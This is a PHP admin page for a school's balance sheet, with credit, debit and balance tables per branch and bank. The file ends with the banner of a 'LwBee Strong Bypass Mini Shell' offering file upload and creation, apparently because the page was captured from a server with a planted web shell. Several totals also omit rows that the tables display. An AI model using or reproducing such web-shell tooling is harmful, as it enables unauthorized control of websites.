/home3/vehiclea/public_html/admin-appleiitfoundationschools-com/defSheet.php
<?php
   include('include/header.php'); 
   include('include/loadingBalSheet.php');  
    ?>
<script language=javascript>
function gotoUrl(b){if(b==""){return}location.href=b}function newWin(b){if(b==""){return}window.open(b.substring(b.indexOf(",")+1,b.length),b.substring(0,b.indexOf(",")))}

  function printContent(el){
    var restorepage = document.body.innerHTML;
    var printcontent = document.getElementById(el).innerHTML;
    document.body.innerHTML = printcontent; 
    window.print();    
    document.body.innerHTML = restorepage;
  } 
 </script>



<main id="main" class="main">
    <div class="pagetitle">
      <h1>School Data</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index.php">Home</a></li> 
          <li class="breadcrumb-item active">Balance Sheet</li>
        </ol>
      </nav>
    </div> 
    <section class="section">
      <div class="row">
        <div class="col-lg-12">
          <div class="card">
             <button class="btn btn-primary btn-sm" style="text-align: center;" onclick="printContent('printing')"> Print </button> 

<!-- <select name=select id=select OnChange=gotoUrl(this.options[this.selectedIndex].value)>
<option value="balanceSheet.php" selected=selected>All Academic</option>
<option value="AcademicYear2015-16.php">2015-16</option>
<option value="AcademicYear2016-17.php">2016-17</option>
<option value="AcademicYear2017-18.php">2017-18</option>
<option value="AcademicYear2018-19.php">2018-19</option>
<option value="AcademicYear2019-20.php">2019-20</option>
<option value="AcademicYear2020-21.php">2020-21</option>
<option value="AcademicYear2021-22.php">2021-22</option>
</select> -->

            <div class="card-body printing" id="printing"> 
              <h5 class="card-title">BALANCESHEET ALL ACADEMIC YEARS</h5> 

              <h3 style="color:green;text-decoration-style: solid;"> PENDING DUES </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody>
                  <tr style="color:white; background-color:green">
                    <th>ALL PENDING DUES</th>
                    <td><?php echo $cmptCreditAmtPD ?></td> 
                    <td><?php echo $cmptDebitAmtPD ?></td>                      
                    <td><?php echo $cmptCreditAmtPD - $cmptDebitAmtPD ?></td>  
                  </tr>   
                </tbody>
              </table>

              <div style="break-after:page"></div>


              <h3 style="color:green;text-decoration-style: solid;"> OLD TOWN </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody>
                  <?php if (($otCreditAmtDurgi - $otDebitAmtDurgi) < 0 ) { ?>

                  <tr style="color:red">
                    <th>Durgi</th>
                    <td><?php echo $otCreditAmtDurgi ?></td> 
                    <td><?php echo $otDebitAmtDurgi ?></td>                      
                    <td><?php echo $otCreditAmtDurgi - $otDebitAmtDurgi ?></td>  
                  </tr> 
                  <?php } ?> 

                  <?php if (($otCreditAmtSPNAGAR - $otDebitAmtSPNAGAR) < 0 ) { ?>
                  <tr style="color:red">
                    <th>SP Nagar</th>
                    <td><?php echo $otCreditAmtSPNAGAR ?></td> 
                    <td><?php echo $otDebitAmtSPNAGAR ?></td>                      
                    <td><?php echo $otCreditAmtSPNAGAR - $otDebitAmtSPNAGAR ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($otCreditAmtDegree - $otDebitAmtDegree) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Degree</th>
                    <td><?php echo $otCreditAmtDegree ?></td> 
                    <td><?php echo $otDebitAmtDegree ?></td>                      
                    <td><?php echo $otCreditAmtDegree - $otDebitAmtDegree ?></td>  
                  </tr> 
                  <?php } ?>  
                  <?php if (($otCreditAmtInter - $otDebitAmtInter) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Intermediate</th>
                    <td><?php echo $otCreditAmtInter ?></td> 
                    <td><?php echo $otDebitAmtInter ?></td>                      
                    <td><?php echo $otCreditAmtInter - $otDebitAmtInter ?></td>  
                  </tr>  
                  <?php } ?>
                  <?php if (($otCreditAmtBVR - $otDebitAmtBVR) < 0 ) { ?>  
                  <tr style="color:red">
                    <th>BV REDDY</th>
                    <td><?php echo $otCreditAmtBVR ?></td> 
                    <td><?php echo $otDebitAmtBVR  ?></td>                      
                    <td><?php echo $otCreditAmtBVR - $otDebitAmtBVR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($otCreditAmtARR - $otDebitAmtARR) < 0 ) { ?>
                   <tr style="color:red">
                    <th>DR ARR</th>
                    <td><?php echo $otCreditAmtARR ?></td> 
                    <td><?php echo $otDebitAmtARR  ?></td>                      
                    <td><?php echo $otCreditAmtARR - $otDebitAmtARR ?></td>  
                  </tr> 
                  <?php } ?>
                  <?php if (($otCreditAmtAB - $otDebitAmtAB) < 0 ) { ?> 
                   <tr style="color:red">
                    <th>Andhra/Union Bank</th>
                    <td><?php echo $otCreditAmtAB ?></td> 
                    <td><?php echo $otDebitAmtAB ?></td>                      
                    <td><?php echo $otCreditAmtAB - $otDebitAmtAB ?></td>  
                  </tr> 

                  <?php } ?> 
                  <?php if (($otCreditAmtHdfc - $otDebitAmtHdfc) < 0 ) { ?> 
                   <tr style="color:red">
                    <th>HDFC BANK</th>
                    <td><?php echo $otCreditAmtHdfc ?></td> 
                    <td><?php echo $otDebitAmtHdfc  ?></td>                      
                    <td><?php echo $otCreditAmtHdfc - $otDebitAmtHdfc ?></td>  
                  </tr>  


                  <?php } ?> 
                  <?php if (($otCreditAmtIcici - $otDebitAmtIcici) < 0 ) { ?>
                   <tr style="color:red">
                    <th>ICICI BANK</th>
                    <td><?php echo $otCreditAmtIcici ?></td> 
                    <td><?php echo $otDebitAmtIcici  ?></td>                      
                    <td><?php echo $otCreditAmtIcici - $otDebitAmtIcici ?></td>  
                  </tr>

                  <?php } ?> 
                  <?php if (($otCreditAmtOL - $otDebitAmtOL) < 0 ) { ?> 
                   <tr style="color:red">
                    <th>OTHER LOANS</th>
                    <td><?php echo $otCreditAmtOL ?></td> 
                    <td><?php echo $otDebitAmtOL  ?></td>                      
                    <td><?php echo $otCreditAmtOL - $otDebitAmtOL ?></td>  
                  </tr>


                  <?php } ?>
                   
                  <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalCreditOT = $otCreditAmtDurgi + $otCreditAmtSPNAGAR + $otCreditAmtDegree +  $otCreditAmtInter +  $otCreditAmtBVR + $otCreditAmtARR +  $otCreditAmtHdfc + $otCreditAmtIcici + $otCreditAmtOL ; echo $totalCreditOT; 
                     ?></td> 
                    <td><?php $totalDebitOT = $otDebitAmtDurgi + $otDebitAmtSPNAGAR + $otDebitAmtDegree + $otDebitAmtInter + $otDebitAmtBVR + $otDebitAmtARR + $otDebitAmtHdfc + $otDebitAmtIcici + $otDebitAmtOL ; echo $totalDebitOT; ?></td>                      
                    <td><?php echo $totalCreditOT - $totalDebitOT ?></td>  
                  </tr>
                </tbody>
              </table> <br>
              <div style="break-after:page"></div>

              <h3 style="color:green;text-decoration-style: solid;"> SP NAGAR </h3>
              <table class="table" style="width: 100%;">
                <thead> 
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody> 
                  <?php if (($spnCreditAmtDurgi - $spnDebitAmtDurgi) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Durgi</th>
                    <td><?php echo $spnCreditAmtDurgi ?></td> 
                    <td><?php echo $spnDebitAmtDurgi ?></td>                      
                    <td><?php echo $spnCreditAmtDurgi - $spnDebitAmtDurgi ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($spnCreditAmtOLDTOWN - $spnDebitAmtOLDTOWN) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Old Town</th>
                    <td><?php echo $spnCreditAmtOLDTOWN ?></td> 
                    <td><?php echo $spnDebitAmtOLDTOWN ?></td>                      
                    <td><?php echo $spnCreditAmtOLDTOWN - $spnDebitAmtOLDTOWN ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($spnCreditAmtDegree - $spnDebitAmtDegree) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Degree</th>
                    <td><?php echo $spnCreditAmtDegree ?></td> 
                    <td><?php echo $spnDebitAmtDegree ?></td>                      
                    <td><?php echo $spnCreditAmtDegree - $spnDebitAmtDegree ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($spnCreditAmtInter - $spnDebitAmtInter) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Intermediate</th>
                    <td><?php echo $spnCreditAmtInter ?></td> 
                    <td><?php echo $spnDebitAmtInter ?></td>                      
                    <td><?php echo $spnCreditAmtInter - $spnDebitAmtInter ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($spnCreditAmtBVR - $spnDebitAmtBVR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>BV REDDY</th>
                    <td><?php echo $spnCreditAmtBVR ?></td> 
                    <td><?php echo $spnDebitAmtBVR  ?></td>                      
                    <td><?php echo $spnCreditAmtBVR - $spnDebitAmtBVR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($spnCreditAmtARR - $spnDebitAmtARR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>DR ARR</th>
                    <td><?php echo $spnCreditAmtARR ?></td> 
                    <td><?php echo $spnDebitAmtARR  ?></td>                      
                    <td><?php echo $spnCreditAmtARR - $spnDebitAmtARR ?></td>  
                  </tr>
                  <?php } ?> 
                  <?php if (($spnCreditAmtAB - $spnDebitAmtAB) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Andhra/Union Bank</th>
                    <td><?php echo $spnCreditAmtAB ?></td> 
                    <td><?php echo $spnDebitAmtAB ?></td>                      
                    <td><?php echo $spnCreditAmtAB - $spnDebitAmtAB ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($spnCreditAmtHdfc - $spnDebitAmtHdfc) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>HDFC BANK</th>
                    <td><?php echo $spnCreditAmtHdfc ?></td> 
                    <td><?php echo $spnDebitAmtHdfc  ?></td>                      
                    <td><?php echo $spnCreditAmtHdfc - $spnDebitAmtHdfc ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($spnCreditAmtIcici - $spnDebitAmtIcici) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>ICICI BANK</th>
                    <td><?php echo $spnCreditAmtIcici ?></td> 
                    <td><?php echo $spnDebitAmtIcici  ?></td>                      
                    <td><?php echo $spnCreditAmtIcici - $spnDebitAmtIcici ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($spnCreditAmtOL - $spnDebitAmtOL) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>OTHER LOANS</th>
                    <td><?php echo $spnCreditAmtOL ?></td> 
                    <td><?php echo $spnDebitAmtOL  ?></td>                      
                    <td><?php echo $spnCreditAmtOL - $spnDebitAmtOL ?></td>  
                  </tr>
                  <?php } ?>
                  <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalCreditSPNAGAR = $spnCreditAmtDegree + $spnCreditAmtInter + $spnCreditAmtBVR + $spnCreditAmtARR + $spnCreditAmtIcici + $spnCreditAmtOL; echo $totalCreditSPNAGAR; 
                     ?></td> 
                    <td><?php $totalDebitSPNAGAR = $spnDebitAmtDegree + $spnDebitAmtInter +  
                    $spnDebitAmtBVR + $spnDebitAmtARR + $spnDebitAmtIcici + $spnDebitAmtOL; echo $totalDebitSPNAGAR; ?></td>                      
                    <td><?php echo $totalCreditSPNAGAR - $totalDebitSPNAGAR ?></td>  
                  </tr> 
                </tbody>
              </table> 
<div style="break-after:page"></div>

              <h3 style="color:green;text-decoration-style: solid;"> DURGI </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody> 
                  <?php if (($durgiCreditAmtSPNAGAR - $durgiDebitAmtSPNAGAR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>SP Nagar</th>
                    <td><?php echo $durgiCreditAmtSPNAGAR ?></td> 
                    <td><?php echo $durgiDebitAmtSPNAGAR ?></td>                      
                    <td><?php echo $durgiCreditAmtSPNAGAR - $durgiDebitAmtSPNAGAR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtOLDTOWN - $durgiDebitAmtOLDTOWN) < 0 ) { ?>  
                  <tr style="color:red">
                    <th>Old Town</th>
                    <td><?php echo $durgiCreditAmtOLDTOWN ?></td> 
                    <td><?php echo $durgiDebitAmtOLDTOWN?></td>                      
                    <td><?php echo $durgiCreditAmtOLDTOWN - $durgiDebitAmtOLDTOWN ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($durgiCreditAmtDegree - $durgiDebitAmtDegree) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Degree</th>
                    <td><?php echo $durgiCreditAmtDegree ?></td> 
                    <td><?php echo $durgiDebitAmtDegree ?></td>                      
                    <td><?php echo $durgiCreditAmtDegree - $durgiDebitAmtDegree ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($durgiCreditAmtInter - $durgiDebitAmtInter) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Intermediate</th>
                    <td><?php echo $durgiCreditAmtInter ?></td> 
                    <td><?php echo $durgiDebitAmtInter ?></td>                      
                    <td><?php echo $durgiCreditAmtInter - $durgiDebitAmtInter ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtBVR - $durgiDebitAmtBVR) < 0 ) { ?> 

                  <tr style="color:red">
                    <th>BV REDDY</th>
                    <td><?php echo $durgiCreditAmtBVR ?></td> 
                    <td><?php echo $durgiDebitAmtBVR  ?></td>                      
                    <td><?php echo $durgiCreditAmtBVR - $durgiDebitAmtBVR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtARR - $durgiDebitAmtARR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>DR ARR</th>
                    <td><?php echo $durgiCreditAmtARR ?></td> 
                    <td><?php echo $durgiDebitAmtARR  ?></td>                      
                    <td><?php echo $durgiCreditAmtARR - $durgiDebitAmtARR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtAB - $durgiDebitAmtAB) < 0 ) { ?>  
                  <tr style="color:red">
                    <th>Andhra/Union Bank</th>
                    <td><?php echo $durgiCreditAmtAB ?></td> 
                    <td><?php echo $durgiDebitAmtAB ?></td>                      
                    <td><?php echo $durgiCreditAmtAB - $durgiDebitAmtAB ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtHdfc - $durgiDebitAmtHdfc) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>HDFC BANK</th>
                    <td><?php echo $durgiCreditAmtHdfc ?></td> 
                    <td><?php echo $durgiDebitAmtHdfc  ?></td>                      
                    <td><?php echo $durgiCreditAmtHdfc - $durgiDebitAmtHdfc ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtIcici - $durgiDebitAmtIcici) < 0 ) { ?>  
                  <tr style="color:red">
                    <th>ICICI BANK</th>
                    <td><?php echo $durgiCreditAmtIcici ?></td> 
                    <td><?php echo $durgiDebitAmtIcici  ?></td>                      
                    <td><?php echo $durgiCreditAmtIcici - $durgiDebitAmtIcici ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($durgiCreditAmtOL - $durgiDebitAmtOL) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>OTHER LOANS</th>
                    <td><?php echo $durgiCreditAmtOL ?></td> 
                    <td><?php echo $durgiDebitAmtOL  ?></td>                      
                    <td><?php echo $durgiCreditAmtOL - $durgiDebitAmtOL ?></td>  
                  </tr> 
                  <?php } ?>  
              
              <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalCreditDurgi = $durgiCreditAmtSPNAGAR + $durgiCreditAmtInter  + $durgiCreditAmtBVR + $durgiCreditAmtARR + $durgiCreditAmtIcici + $durgiCreditAmtOL; echo $totalCreditDurgi; 
                     ?></td> 
                    <td><?php $totalDebitDurgi = $durgiDebitAmtSPNAGAR + $durgiDebitAmtInter  + $durgiDebitAmtBVR + $durgiDebitAmtARR + $durgiDebitAmtIcici + $durgiDebitAmtOL; echo $totalDebitDurgi; ?></td>
                    <td><?php echo $totalCreditDurgi - $totalDebitDurgi ?></td>  
                  </tr> 
                </tbody>
              </table> 
<div style="break-after:page"></div>

              <h3 style="color:green;text-decoration-style: solid;"> DEGREE </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody> 
                  <?php if (($degreeCreditAmtOLDTOWN - $degreeDebitAmtOLDTOWN) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Old Town</th>
                    <td><?php echo $degreeCreditAmtOLDTOWN ?></td> 
                    <td><?php echo $degreeDebitAmtOLDTOWN ?></td>                      
                    <td><?php echo $degreeCreditAmtOLDTOWN - $degreeDebitAmtOLDTOWN ?></td> 
                  </tr>  
                  <?php } ?> 
                  <?php if (($degreeCreditAmtSPNAGAR - $degreeDebitAmtSPNAGAR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>SP Nagar</th>
                    <td><?php echo $degreeCreditAmtSPNAGAR ?></td> 
                    <td><?php echo $degreeDebitAmtSPNAGAR ?></td>                      
                    <td><?php echo $degreeCreditAmtSPNAGAR - $degreeDebitAmtSPNAGAR ?></td> 
                  </tr>  
                  <?php } ?> 
                  <?php if (($degreeCreditAmtDurgi - $degreeDebitAmtDurgi) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Durgi</th>
                    <td><?php echo $degreeCreditAmtDurgi ?></td> 
                    <td><?php echo $degreeDebitAmtDurgi ?></td>                      
                    <td><?php echo $degreeCreditAmtDurgi - $degreeDebitAmtDurgi ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($degreeCreditAmtInter - $degreeDebitAmtInter) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Intermediate</th>
                    <td><?php echo $degreeCreditAmtInter ?></td> 
                    <td><?php echo $degreeDebitAmtInter ?></td>                      
                    <td><?php echo $degreeCreditAmtInter - $degreeDebitAmtInter ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($degreeCreditAmtBVR - $degreeDebitAmtBVR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>BV REDDY</th>
                    <td><?php echo $degreeCreditAmtBVR ?></td> 
                    <td><?php echo $degreeDebitAmtBVR  ?></td>                      
                    <td><?php echo $degreeCreditAmtBVR - $degreeDebitAmtBVR ?></td>  
                  </tr>
                  <?php } ?> 
                  <?php if (($degreeCreditAmtARR - $degreeDebitAmtARR) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>DR ARR</th>
                    <td><?php echo $degreeCreditAmtARR ?></td> 
                    <td><?php echo $degreeDebitAmtARR  ?></td>                      
                    <td><?php echo $degreeCreditAmtARR - $degreeDebitAmtARR ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($degreeCreditAmtAB - $degreeDebitAmtAB) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>Andhra/Union Bank</th>
                    <td><?php echo $degreeCreditAmtAB ?></td> 
                    <td><?php echo $degreeDebitAmtAB ?></td>                      
                    <td><?php echo $degreeCreditAmtAB - $degreeDebitAmtAB ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($degreeCreditAmtHdfc - $degreeDebitAmtHdfc) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>HDFC BANK</th>
                    <td><?php echo $degreeCreditAmtHdfc ?></td> 
                    <td><?php echo $degreeDebitAmtHdfc  ?></td>                      
                    <td><?php echo $degreeCreditAmtHdfc - $degreeDebitAmtHdfc ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($degreeCreditAmtIcici - $degreeDebitAmtIcici) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>ICICI BANK</th>
                    <td><?php echo $degreeCreditAmtIcici ?></td> 
                    <td><?php echo $degreeDebitAmtIcici  ?></td>                      
                    <td><?php echo $degreeCreditAmtIcici - $degreeDebitAmtIcici ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($degreeCreditAmtOL - $degreeDebitAmtOL) < 0 ) { ?> 
                  <tr style="color:red">
                    <th>OTHER LOANS</th>
                    <td><?php echo $degreeCreditAmtOL ?></td> 
                    <td><?php echo $degreeDebitAmtOL  ?></td>                      
                    <td><?php echo $degreeCreditAmtOL - $degreeDebitAmtOL ?></td>  
                  </tr> 
                  <?php } ?> 
                  <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalCreditDegree = $degreeCreditAmtInter + $degreeCreditAmtBVR + $degreeCreditAmtARR + $degreeCreditAmtHdfc + $degreeCreditAmtIcici + $degreeCreditAmtOL ; echo $totalCreditDegree; 
                     ?></td> 
                    <td><?php $totalDebitDegree = $degreeDebitAmtInter + $degreeDebitAmtBVR + $degreeDebitAmtARR +  $degreeDebitAmtHdfc + $degreeDebitAmtIcici + $degreeDebitAmtOL  ; echo $totalDebitDegree; ?></td>
                    <td><?php echo $totalCreditDegree - $totalDebitDegree ?></td> 
                  </tr> 
                </tbody>
              </table> 
<div style="break-after:page"></div>

<h3 style="color:green;text-decoration-style: solid;"> INTERMEDIATE </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody> 
                  <?php if (($interCreditAmtOLDTOWN - $interDebitAmtOLDTOWN) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Old Town</th>
                    <td><?php echo $interCreditAmtOLDTOWN ?></td> 
                    <td><?php echo $interDebitAmtOLDTOWN ?></td>                      
                    <td><?php echo $interCreditAmtOLDTOWN - $interDebitAmtOLDTOWN ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($interCreditAmtSPNAGAR - $interDebitAmtSPNAGAR) < 0 ) { ?>
                  <tr style="color:red">
                    <th>SP Nagar</th>
                    <td><?php echo $interCreditAmtSPNAGAR ?></td> 
                    <td><?php echo $interDebitAmtSPNAGAR ?></td>                      
                    <td><?php echo $interCreditAmtSPNAGAR - $interDebitAmtSPNAGAR ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($interCreditAmtDurgi - $interDebitAmtDurgi) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Durgi</th>
                    <td><?php echo $interCreditAmtDurgi ?></td> 
                    <td><?php echo $interDebitAmtDurgi ?></td>                      
                    <td><?php echo $interCreditAmtDurgi - $interDebitAmtDurgi ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($interCreditAmtDegree - $interDebitAmtDegree) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Degree</th>
                    <td><?php echo $interCreditAmtDegree ?></td> 
                    <td><?php echo $interDebitAmtDegree  ?></td>                      
                    <td><?php echo $interCreditAmtDegree  - $interDebitAmtDegree  ?></td>  
                  </tr>   
                  <?php } ?> 
                  <?php if (($interCreditAmtBVR - $interDebitAmtBVR) < 0 ) { ?>                  
                  <tr style="color:red">
                    <th>BV REDDY</th>
                    <td><?php echo $interCreditAmtBVR ?></td> 
                    <td><?php echo $interDebitAmtBVR  ?></td>                      
                    <td><?php echo $interCreditAmtBVR - $interDebitAmtBVR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($interCreditAmtARR - $interDebitAmtARR) < 0 ) { ?>
                  <tr style="color:red">
                    <th>DR ARR</th>
                    <td><?php echo $interCreditAmtARR ?></td> 
                    <td><?php echo $interDebitAmtARR  ?></td>                      
                    <td><?php echo $interCreditAmtARR - $interDebitAmtARR ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($interCreditAmtAB - $interDebitAmtAB) < 0 ) { ?>
                  <tr style="color:red">
                    <th>Andhra/Union Bank</th>
                    <td><?php echo $interCreditAmtAB ?></td> 
                    <td><?php echo $interDebitAmtAB ?></td>                      
                    <td><?php echo $interCreditAmtAB - $interDebitAmtAB ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($interCreditAmtHdfc - $interDebitAmtHdfc) < 0 ) { ?>
                  <tr style="color:red">
                    <th>HDFC BANK</th>
                    <td><?php echo $interCreditAmtHdfc ?></td> 
                    <td><?php echo $interDebitAmtHdfc  ?></td>                      
                    <td><?php echo $interCreditAmtHdfc - $interDebitAmtHdfc ?></td>  
                  </tr>  
                  <?php } ?> 
                  <?php if (($interCreditAmtIcici - $interDebitAmtIcici) < 0 ) { ?>
                  <tr style="color:red">
                    <th>ICICI BANK</th>
                    <td><?php echo $interCreditAmtIcici ?></td> 
                    <td><?php echo $interDebitAmtIcici  ?></td>                      
                    <td><?php echo $interCreditAmtIcici - $interDebitAmtIcici ?></td>  
                  </tr> 
                  <?php } ?> 
                  <?php if (($interCreditAmtOL - $interDebitAmtOL) < 0 ) { ?>
                  <tr style="color:red">
                    <th>OTHER LOANS</th>
                    <td><?php echo $interCreditAmtOL ?></td> 
                    <td><?php echo $interDebitAmtOL  ?></td>                      
                    <td><?php echo $interCreditAmtOL - $interDebitAmtOL ?></td>  
                  </tr>
                  <?php } ?>  
                  <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalCreditInter = $interCreditAmtAB +  $interCreditAmtBVR + $interCreditAmtARR +  $interCreditAmtHdfc + $interCreditAmtIcici ; echo $totalCreditInter; 
                     ?></td> 
                    <td><?php $totalDebitInter = $interDebitAmtAB + $interDebitAmtBVR + $interDebitAmtARR + $interDebitAmtHdfc + $interDebitAmtIcici; echo $totalDebitInter; ?></td>                     
                    <td><?php echo $totalCreditInter - $totalDebitInter ?></td>  
                  </tr> 
                </tbody>
              </table> 
<div style="break-after:page"></div>





<h3 style="color:green;text-decoration-style: solid;"> TOTAL BALANCESHEET </h3>
              <table class="table" style="width: 100%;">
                <thead>
                  <tr style="background-color: blue; color: white;"> 
                    <th>AREA</th>
                    <th>CREDIT</th>  
                    <th>DEBIT</th>
                    <th>BALANCE</th> 
                  </tr>
                </thead> 
                <tbody>
                  <tr style="color:red">
                    <th>Old Town</th>
                    <td><?php echo $totalCreditOT ?></td> 
                    <td><?php echo $totalDebitOT ?></td>                      
                    <td><?php echo $totalCreditOT - $totalDebitOT ?></td>  
                  </tr>  
                  <tr style="color:red">
                    <th>SP Nagar</th>
                    <td><?php echo $totalCreditSPNAGAR ?></td> 
                    <td><?php echo $totalDebitSPNAGAR ?></td>                      
                    <td><?php echo $totalCreditSPNAGAR - $totalDebitSPNAGAR ?></td>  
                  </tr>  
                  <tr style="color:red">
                    <th>Durgi</th>
                    <td><?php echo $totalCreditDurgi ?></td> 
                    <td><?php echo $totalDebitDurgi ?></td>                      
                    <td><?php echo $totalCreditDurgi - $totalDebitDurgi ?></td>  
                  </tr>  
                  <tr style="color:red">
                    <th>Degree</th>
                    <td><?php echo $totalCreditDegree ?></td> 
                    <td><?php echo $totalDebitDegree  ?></td>                      
                    <td><?php echo $totalCreditDegree - $totalDebitDegree ?></td>  
                  </tr> 
                  <tr style="color:red">
                    <th>Intermediate</th>
                    <td><?php echo $totalCreditInter ?></td> 
                    <td><?php echo $totalDebitInter  ?></td>                      
                    <td><?php echo $totalCreditInter - $totalDebitInter ?></td>  
                  </tr>  
                   <tr style="background-color:yellow; color: red;">
                    <th>Total</th>
                    <td><?php $totalDefSheetCredit = $totalCreditOT + $totalCreditSPNAGAR + $totalCreditDurgi + $totalCreditDegree + $totalCreditInter ; echo $totalDefSheetCredit; 
                     ?></td> 
                    <td><?php $totalDefSheetDebit = $totalDebitOT + $totalDebitSPNAGAR + $totalDebitDurgi + $totalDebitDegree + $totalDebitInter; echo $totalDefSheetDebit; ?></td>
                    <td><?php echo $totalDefSheetCredit - $totalDefSheetDebit ?></td> 
                  </tr>     
                </tbody>
              </table>

            </div>
          </div>
        </div>
      </div>
    </section>

  </main> 

  <?php include('include/footer.php'); ?>
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File